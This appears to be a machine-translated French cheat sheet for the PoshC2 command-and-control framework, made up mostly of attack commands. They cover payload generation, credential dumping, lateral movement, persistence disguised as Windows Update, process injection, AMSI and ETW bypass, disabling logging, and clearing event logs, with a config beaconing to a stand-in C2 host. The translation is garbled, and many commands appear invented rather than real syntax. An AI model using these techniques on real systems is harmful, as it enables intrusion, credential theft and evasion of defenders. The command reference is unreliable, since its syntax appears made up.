PoshC2 Cadre feuille de chaleur

Copier toutes les commandes Générer PDF

Aperçu général

PoshC2 est un cadre C2 mis au point par Nettitude pour les activités d'équipes rouges et post-exploitation. Il dispose de capacités d'exploitation PowerShell, d'outils de mouvement latéraux et d'un support proxy complet pour fonctionner dans des environnements réseau restreints.

C'est pas vrai. Attention : Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.

Installation

Installation Ubuntu/Debian

# Update system
sudo apt update && sudo apt upgrade -y

# Install dependencies
sudo apt install curl python3 python3-pip python3-dev git build-essential

# Clone PoshC2
git clone https://github.com/nettitude/PoshC2.git
cd PoshC2

# Install PoshC2
sudo ./Install.sh

# Alternative pip installation
pip3 install poshc2

Installation Docker

# Pull PoshC2 Docker image
docker pull nettitude/poshc2

# Run PoshC2 in Docker
docker run -it -p 443:443 -p 80:80 nettitude/poshc2

# Run with persistent data
docker run -it -v /opt/poshc2:/opt/PoshC2_Project nettitude/poshc2
```_

### Installation manuelle
```bash
# Install Python dependencies
pip3 install -r requirements.txt

# Install additional tools
sudo apt install mingw-w64 mono-mcs

# Set up database
python3 -c "from poshc2.server.database.DBUtil import *; initializedb()"
```_

## Utilisation de base

### Démarrer le serveur PoshC2
```bash
# Start PoshC2 server
poshc2 --start

# Start with custom configuration
poshc2 --start --config /path/to/config.yml

# Start with specific project
poshc2 --start --project MyProject

Créer un nouveau projet

# Create new project
poshc2 --new-project ProjectName

# List projects
poshc2 --list-projects

# Switch project
poshc2 --project ProjectName

Référence de commande

Gestion des serveurs

Command	Description
`help`	Display help menu
`show-urls`	Show payload URLs
`list-implants`	List active implants
`implant-handler`	Enter implant handler
`quit`	Exit PoshC2

Commandes implantatrices

Command	Description
`help`	Show implant commands
`back`	Return to main menu
`list-implants`	List all implants
`use <implant-id>`	Select implant
`kill <implant-id>`	Kill implant
`remove-implant <implant-id>`	Remove implant from database

Interactions des implants

Command	Description
`help`	Show available commands
`shell <command>`	Execute shell command
`upload-file <local> <remote>`	Upload file
`download-file <remote>`	Download file
`screenshot`	Take screenshot
`get-system`	Attempt privilege escalation

Génération de charge utile

Charges utiles PowerShell

# Generate PowerShell payload
poshc2 --gen-payload powershell

# Generate encoded PowerShell
poshc2 --gen-payload powershell --encoded

# Generate PowerShell with proxy
poshc2 --gen-payload powershell --proxy http://proxy:8080

Charges utiles exécutables

# Generate Windows executable
poshc2 --gen-payload exe

# Generate DLL payload
poshc2 --gen-payload dll

# Generate service executable
poshc2 --gen-payload service-exe

Charges utiles Web

# Generate HTA payload
poshc2 --gen-payload hta

# Generate macro payload
poshc2 --gen-payload macro

# Generate JavaScript payload
poshc2 --gen-payload js

Charges utiles Linux

# Generate Linux Python payload
poshc2 --gen-payload py

# Generate Linux shell payload
poshc2 --gen-payload sh

# Generate Linux ELF payload
poshc2 --gen-payload elf

Configuration de proxy

Prise en charge HTTP Proxy

# Configure HTTP proxy
set-proxy http://proxy.company.com:8080

# Configure authenticated proxy
set-proxy http://username:password@proxy.company.com:8080

# Configure SOCKS proxy
set-proxy socks5://proxy.company.com:1080

Configuration de la chaîne mandataire

# Multiple proxy configuration
set-proxy-chain http://proxy1:8080,socks5://proxy2:1080

# Proxy with authentication
set-proxy-chain http://user:pass@proxy1:8080,http://proxy2:3128

Essai de proxy

# Test proxy connectivity
test-proxy http://proxy.company.com:8080

# Test proxy authentication
test-proxy http://username:password@proxy.company.com:8080

Commandements post-exploitation

Informations sur le système

# Get system information
get-computerinfo

# Get current user
whoami

# Get domain information
get-domain

# Get local users
get-localuser

# Get local groups
get-localgroup

Récolte crédible

# Dump SAM database
hashdump

# Dump LSA secrets
lsa-secrets

# Dump cached credentials
cachedump

# Extract browser passwords
get-browserdata

# Dump WiFi passwords
get-wifipasswords

Recensement actif des répertoires

# Get domain controllers
get-domaincontroller

# Get domain users
get-domainuser

# Get domain groups
get-domaingroup

# Get domain computers
get-domaincomputer

# Get domain admins
get-domainadmin

Mouvement latéral

# WMI execution
invoke-wmiexec -target 192.168.1.10 -command "whoami"

# PSExec execution
invoke-psexec -target 192.168.1.10 -command "whoami"

# SMB execution
invoke-smbexec -target 192.168.1.10 -command "whoami"

# DCOM execution
invoke-dcomexec -target 192.168.1.10 -command "whoami"

Persistance

# Registry persistence
new-persistence -method registry -key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Scheduled task persistence
new-persistence -method scheduledtask -taskname "WindowsUpdate"

# Service persistence
new-persistence -method service -servicename "WindowsUpdateService"

# WMI persistence
new-persistence -method wmi -eventname "ProcessStart"

Caractéristiques avancées

Modules PowerShell

# Load PowerShell module
loadmodule /path/to/module.ps1

# Import PowerView
loadmodule PowerView

# Import Invoke-Mimikatz
loadmodule Invoke-Mimikatz

# Import PowerUp
loadmodule PowerUp

. Exécution de l'assemblage NET

# Execute .NET assembly
run-exe /path/to/assembly.exe arguments

# Execute in memory
run-exe-inmemory /path/to/assembly.exe arguments

# Reflective DLL loading
invoke-reflectivedllinjection /path/to/dll.dll

Injection de procédé

# Inject into process
inject-shellcode -processid 1234 -shellcode <base64>

# Process hollowing
invoke-processhollowing -target notepad.exe -payload /path/to/payload.exe

# DLL injection
invoke-dllinjection -processid 1234 -dllpath /path/to/dll.dll

Opérations réseau

# Port scanning
invoke-portscan -hosts 192.168.1.0/24 -ports 22,80,443,3389

# Network discovery
invoke-networkscan -subnet 192.168.1.0/24

# SMB enumeration
invoke-smbenum -target 192.168.1.10

# Share enumeration
invoke-shareenum -target 192.168.1.10

Techniques d'évacuation

Dépassement AMSI

# AMSI bypass
amsi-bypass

# Custom AMSI bypass
amsi-bypass -method custom

# Reflection-based bypass
amsi-bypass -method reflection

ETW Dépassement

# ETW bypass
etw-bypass

# Disable ETW logging
disable-etw

# Patch ETW functions
patch-etw

Bypass d'exploitation de PowerShell

# Disable PowerShell logging
disable-pslogging

# Bypass script block logging
bypass-scriptblocklogging

# Disable module logging
disable-modulelogging

Obfuscation

# Obfuscate PowerShell command
invoke-obfuscation -command "Get-Process"

# String obfuscation
obfuscate-string "sensitive string"

# Variable obfuscation
obfuscate-variables

Piment et tunnel

SOCKS Proxy

# Start SOCKS proxy
start-socksproxy -port 1080

# Stop SOCKS proxy
stop-socksproxy

# List proxy connections
list-socksproxy

Transfert de port

# Local port forward
portforward -localport 8080 -remotehost 192.168.2.10 -remoteport 80

# Reverse port forward
portforward -reverse -localport 9090 -remotehost 127.0.0.1 -remoteport 22

# Stop port forward
stop-portforward -id 1

Chaîne de balises

# Create beacon chain
new-beacon -parent <parent-id> -child <child-id>

# List beacon chains
list-beacons

# Remove beacon chain
remove-beacon -id <beacon-id>

Sécurité opérationnelle

Sécurité des communications

# Use HTTPS communications
set-comms https

# Custom User-Agent
set-useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Custom headers
set-headers "X-Forwarded-For: 192.168.1.100"

# Domain fronting
set-domainfront cdn.example.com

Sécurité de la charge utile

# Encrypt payloads
encrypt-payload -key "encryption-key"

# Sign payloads
sign-payload -cert /path/to/cert.pfx

# Obfuscate payloads
obfuscate-payload -method xor

Anti-forensiques

# Clear event logs
clear-eventlogs

# Timestomp files
timestomp -file /path/to/file -time "01/01/2020 12:00:00"

# Secure delete
sdelete -file /path/to/file

# Clear tracks
clear-tracks

Dépannage

Problèmes de connexion

# Check implant connectivity
test-connectivity

# Verify proxy settings
show-proxy

# Test DNS resolution
test-dns google.com

# Check firewall rules
get-firewallrules

Questions relatives à la charge utile

# Regenerate payloads
regenerate-payloads

# Test payload execution
test-payload /path/to/payload.exe

# Check AV detection
test-av /path/to/payload.exe

Problèmes de performance

# Adjust beacon interval
set-beacon-time 30

# Optimize jitter
set-jitter 0.2

# Reduce payload size
compress-payload

Questions relatives aux bases de données

# Repair database
repair-database

# Backup database
backup-database /path/to/backup

# Restore database
restore-database /path/to/backup

Configuration

Configuration du serveur

# config.yml
PayloadCommsHost: "https://c2.example.com"
PayloadCommsPort: "443"
DomainFrontHeader: "cdn.example.com"
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Referrer: "https://google.com"
ServerHeader: "Apache/2.4.41"
HTTPResponse: "404"

Configuration de proxy

# Proxy settings
ProxyURL: "http://proxy.company.com:8080"
ProxyUser: "username"
ProxyPass: "password"
ProxyType: "http"  # http, socks4, socks5

Ressources

[PoshC2 GitHub Repository] (LINK_4)
[Documentation de la Conférence des Parties] (LINK_4)
[Blogue sur les réseaux] (LINK_4)
[PoshC2 Wiki] (LINK_4)

*Cette feuille de triche fournit une référence complète pour l'utilisation du cadre PoshC2. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *